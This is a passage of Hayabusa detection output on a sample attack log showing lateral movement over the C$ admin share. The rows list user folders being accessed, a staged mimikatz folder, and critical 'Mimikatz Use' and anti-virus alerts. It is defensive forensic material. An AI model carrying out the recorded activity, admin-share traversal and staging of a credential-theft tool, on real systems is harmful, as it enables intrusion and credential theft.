Users\Administrator.EXAMPLE\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\.ssh : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\New folder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\RDPWrap-v1.6.2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\translations : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\garbage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\winrar-cve : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 